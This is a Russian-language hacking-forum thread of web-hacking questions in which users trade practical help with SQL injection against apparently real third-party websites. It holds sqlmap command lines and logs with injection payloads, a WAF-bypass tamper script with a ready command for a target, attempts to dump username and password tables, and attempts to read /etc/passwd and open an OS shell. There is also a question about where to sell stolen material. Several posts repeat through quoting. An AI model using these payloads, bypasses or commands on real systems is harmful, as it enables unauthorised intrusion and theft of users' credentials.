Скрытый контент для пользователей: c0d3x.
-
XSS.stack #1 – первый литературный журнал от юзеров форума
[web-hacking] Ваши вопросы
- Автор темы .Slip
- Дата начала
-
- Теги
- web-hacking
Скрытый контент для пользователей: kazakboo.
Скрытый контент для пользователей: c0d3x.
Скрытый контент для пользователей: kazakboo.
Люди я новичек,так что не судите строго, сканил акунетиксом и получил скулю запихнул ее в .тхт
Сразу сори что так растянуто, пытался по максимуму описать , может тут вообще ен нужно было использовать так много команд, но я пока только стандартом прохожусь
-r C:\Users\Administrator\Desktop\roGOO.txt --random-agent --banner --time-sec=32 --timeout=180 --ignore-code=400 401 403 424 404 406 500 501 503 504 506 200 --hex --tamper=between,randomcase,charencode -v 3 --force-ssl --threads=10 --level=3 --risk=3 --skip-urlencode
сразу сработал WAF хотя Whatwaf ничего не задетектил
вывелись бд
вывелись таблицы
а вот при колонках
[04:12:29] [DEBUG] creating HTTP requests opener object
[04:12:30] [INFO] resuming back-end DBMS 'mysql'
[04:12:30] [DEBUG] resolving hostname 'site.com'
[04:12:30] [INFO] testing connection to the target URL
[04:12:32] [DEBUG] declared web page charset 'utf-8'
[04:12:32] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
[04:12:32] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=1'"" AND GTID_SUBSET(CONCAT(0x71766b7171,(SELECT (ELT(8421=8421,1))),0x7171787071),8421)-- aALX&step=savedWindow
Vector: AND GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1'"" AND (SELECT 9427 FROM (SELECT(SLEEP(32)))kXdi)-- cMyn&step=savedWindow
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
[04:12:32] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[04:12:32] [INFO] the back-end DBMS is MySQL
[04:12:32] [INFO] fetching banner
[04:12:32] [PAYLOAD] %31%27%22
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n]
но при команде --columns
[04:13:50] [WARNING] the SQL query provided does not return any output
[04:13:50] [WARNING] unable to retrieve column names for table 'user' in database 'test_db'
do you want to use common column existence check? [y/N/q]
но и их я вывел через --search -C
ну и --damp
---
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=1'"" AND GTID_SUBSET(CONCAT(0x71766b7171,(SELECT (ELT(8421=8421,1))),0x7171787071),8421)-- aALX&step=savedWindow
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1'"" AND (SELECT 9427 FROM (SELECT(SLEEP(32)))kXdi)-- cMyn&step=savedWindow
---
[04:23:50] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[04:23:50] [INFO] the back-end DBMS is MySQL
[04:23:50] [INFO] fetching banner
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] y
[04:23:53] [WARNING] reflective value(s) found and filtering out
[04:23:53] [INFO] resumed: '5.7.41'
web application technology: Apache
back-end DBMS: MySQL >= 5.6
banner: '5.7.41'
[04:23:53] [INFO] fetching entries of column(s) 'password,username' for table 'user' in database 'test_db'
[04:23:53] [WARNING] the SQL query provided does not return any output
[04:23:53] [INFO] fetching number of column(s) 'password,username' entries for table 'user' in database 'test_db'
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] n
[04:23:56] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)
[04:24:20] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[04:24:22] [INFO] retrieved:
[04:24:22] [WARNING] unable to retrieve the number of column(s) 'password,username' entries for table 'user' in database 'test_db'
Заранее спасибо за помошь!
Сразу сори что так растянуто, пытался по максимуму описать , может тут вообще ен нужно было использовать так много команд, но я пока только стандартом прохожусь
-r C:\Users\Administrator\Desktop\roGOO.txt --random-agent --banner --time-sec=32 --timeout=180 --ignore-code=400 401 403 424 404 406 500 501 503 504 506 200 --hex --tamper=between,randomcase,charencode -v 3 --force-ssl --threads=10 --level=3 --risk=3 --skip-urlencode
сразу сработал WAF хотя Whatwaf ничего не задетектил
вывелись бд
вывелись таблицы
а вот при колонках
[04:12:29] [DEBUG] creating HTTP requests opener object
[04:12:30] [INFO] resuming back-end DBMS 'mysql'
[04:12:30] [DEBUG] resolving hostname 'site.com'
[04:12:30] [INFO] testing connection to the target URL
[04:12:32] [DEBUG] declared web page charset 'utf-8'
[04:12:32] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
[04:12:32] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=1'"" AND GTID_SUBSET(CONCAT(0x71766b7171,(SELECT (ELT(8421=8421,1))),0x7171787071),8421)-- aALX&step=savedWindow
Vector: AND GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1'"" AND (SELECT 9427 FROM (SELECT(SLEEP(32)))kXdi)-- cMyn&step=savedWindow
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
[04:12:32] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[04:12:32] [INFO] the back-end DBMS is MySQL
[04:12:32] [INFO] fetching banner
[04:12:32] [PAYLOAD] %31%27%22
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n]
но при команде --columns
[04:13:50] [WARNING] the SQL query provided does not return any output
[04:13:50] [WARNING] unable to retrieve column names for table 'user' in database 'test_db'
do you want to use common column existence check? [y/N/q]
но и их я вывел через --search -C
ну и --damp
---
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=1'"" AND GTID_SUBSET(CONCAT(0x71766b7171,(SELECT (ELT(8421=8421,1))),0x7171787071),8421)-- aALX&step=savedWindow
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1'"" AND (SELECT 9427 FROM (SELECT(SLEEP(32)))kXdi)-- cMyn&step=savedWindow
---
[04:23:50] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[04:23:50] [INFO] the back-end DBMS is MySQL
[04:23:50] [INFO] fetching banner
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] y
[04:23:53] [WARNING] reflective value(s) found and filtering out
[04:23:53] [INFO] resumed: '5.7.41'
web application technology: Apache
back-end DBMS: MySQL >= 5.6
banner: '5.7.41'
[04:23:53] [INFO] fetching entries of column(s) 'password,username' for table 'user' in database 'test_db'
[04:23:53] [WARNING] the SQL query provided does not return any output
[04:23:53] [INFO] fetching number of column(s) 'password,username' entries for table 'user' in database 'test_db'
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] n
[04:23:56] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)
[04:24:20] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[04:24:22] [INFO] retrieved:
[04:24:22] [WARNING] unable to retrieve the number of column(s) 'password,username' entries for table 'user' in database 'test_db'
Заранее спасибо за помошь!
Да тут х#й голову сломит. Под хайд скинь, посмотрю вручную.
Ну тамперов ты конечно напихал пиздец
И еще зачем то это?
Там же просто все, фильтруется слово SELECT. Заменяем его на %53eLecT и все работает. Сохрани это в папку с тамперами, например lol.py
Python:
#!/usr/bin/env python
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGHEST
def dependencies():
pass
def tamper(payload, **kwargs):
return payload.replace("SELECT", "%53eLecT") if payload else payload
Код:
sqlmap.py -u "https://твой_таргет/shop/4-link-calculator?id=1*" --dbs --dbms=MySQL --risk=3 --level=5 --tamper=lolНу тамперов ты конечно напихал пиздец
И еще зачем то это?
Там же просто все, фильтруется слово SELECT. Заменяем его на %53eLecT и все работает. Сохрани это в папку с тамперами, например lol.py
И подай мапу команду:Python:#!/usr/bin/env python from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHEST def dependencies(): pass def tamper(payload, **kwargs): return payload.replace("SELECT", "%53eLecT") if payload else payload
Код:sqlmap.py -u "https://твой_таргет/shop/4-link-calculator?id=1*" --dbs --dbms=MySQL --risk=3 --level=5 --tamper=lol
Скрытый контент для пользователей: c0d3x.
Скрытый контент для пользователей: c0d3x.
Скрытый контент для пользователей: c0d3x.
Скрытый контент для пользователей: c0d3x.
Спасибо
Последнее редактирование:
Подскажите плиз, по какой причине sqlmap может фейлиться при чтении файлов? Пробовал через --file-read, засовывал туда вот эти пути. Последние два сама мапа подсказала, когда пытался запустить --os-shell.
Во всех случаях прилетает код ответа 500.
Также пробовал и в sql шелле мапы прописывать
Потом в бурпе руками поковырял, результат тот же.
FILE в списке привилегий есть, параметр --hex вставлять тоже пробовал.
Код:
"/etc/passwd"
"/data/wwwroot/******/catalog/controller/startup/session.php"
"/image/catalog/banners/banner5.png"Также пробовал и в sql шелле мапы прописывать
Код:
select * load_file('/path/to/file')FILE в списке привилегий есть, параметр --hex вставлять тоже пробовал.
Где взять список зарубежных маркетов на которых можно селлить услуги\материал ?
Может фильтр на ковычки, может вывод ограничен кол-во символов, используй MID
Есть доступ к БД через sql-inj, есть таблица с колонками user, password, age, date
могу ли я через sqlmap запустить дамп строк отсортированных по дате? Как я понял нативно sqlmap имеет только поддержку через ключ --where "age='20'" например, в этом ключе я не могу как то вкорячить ORDER BY, или использовать маски или операторы сравнения. по крайней мере тесты на моей БД не дают результатов?
c0d3x помогите пажалуста..
могу ли я через sqlmap запустить дамп строк отсортированных по дате? Как я понял нативно sqlmap имеет только поддержку через ключ --where "age='20'" например, в этом ключе я не могу как то вкорячить ORDER BY, или использовать маски или операторы сравнения. по крайней мере тесты на моей БД не дают результатов?
c0d3x помогите пажалуста..
Что бы было легче, можешь по ид --start --stop . Если не хочешь так, то https://oracleplsql.ru/between-mysql.html